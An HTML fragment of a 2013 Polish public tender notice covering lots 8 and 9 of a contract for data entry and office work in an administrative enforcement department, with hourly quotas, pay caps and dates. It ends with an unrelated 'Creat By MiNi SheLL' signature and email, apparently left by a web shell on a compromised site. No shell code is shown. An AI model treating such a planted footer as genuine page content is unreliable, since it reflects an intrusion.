<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wprowadzanie danych do systemów komputerowych oraz dodatkowe usługi biurowe na potrzeby Działu Egzekucji Administracyjnej.
OL-1/251-5/PN-5/13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu: 
 - informacji o zobowiązanym (INFOTAX/ANALIZATOR) do tytułów wykonawczych w aplikacji EGAPOLTAX - 40 sztuk w ciągu 1 godziny,
- informacji o dacie wszczęcia postępowania i zastosowaniu środka egzekucyjnego w aplikacji  EGAPOLTAX -15 zajęć na 1 godzinę,
- korespondencji wychodzącej w aplikacji Biblioteka Akt oraz wykonanie czynności  
nadawczych tj. zaklejanie korespondencji wychodzącej, wprowadzanie potwierdzeń odbioru  
do Biblioteki Akt oraz podział otrzymanych potwierdzeń odbioru z Urzędu Pocztowego-30 pozycji na 1 godzinę,
- odnotowywanie wpływów zrealizowanych kwot w aplikacji EGAPOLTAX-15 sztuk na 1 godzinę, 
- kompletowanie TW na rejonach-40 sztuk na 1 godzinę,
- archiwizacja akt egzekucyjnych-30 sztuk na godzinę,
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych dziewięciu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 8,30 złotych brutto za jedną godzinę.
Na każdą część zadania zostało przewidziane  664 godziny.
Termin realizacji zadania od 19 sierpnia 2013r. do 20 grudnia 2013 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 19.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wprowadzanie danych do systemów komputerowych oraz dodatkowe usługi biurowe na potrzeby Działu Egzekucji Administracyjnej.
OL-1/251-5/PN-5/13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu: 
 - informacji o zobowiązanym (INFOTAX/ANALIZATOR) do tytułów wykonawczych w aplikacji EGAPOLTAX - 40 sztuk w ciągu 1 godziny,
- informacji o dacie wszczęcia postępowania i zastosowaniu środka egzekucyjnego w aplikacji  EGAPOLTAX -15 zajęć na 1 godzinę,
- korespondencji wychodzącej w aplikacji Biblioteka Akt oraz wykonanie czynności  
nadawczych tj. zaklejanie korespondencji wychodzącej, wprowadzanie potwierdzeń odbioru  
do Biblioteki Akt oraz podział otrzymanych potwierdzeń odbioru z Urzędu Pocztowego-30 pozycji na 1 godzinę,
- odnotowywanie wpływów zrealizowanych kwot w aplikacji EGAPOLTAX-15 sztuk na 1 godzinę, 
- kompletowanie TW na rejonach-40 sztuk na 1 godzinę,
- archiwizacja akt egzekucyjnych-30 sztuk na godzinę,
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych dziewięciu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 8,30 złotych brutto za jedną godzinę.
Na każdą część zadania zostało przewidziane  664 godziny.
Termin realizacji zadania od 19 sierpnia 2013r. do 20 grudnia 2013 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 19.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com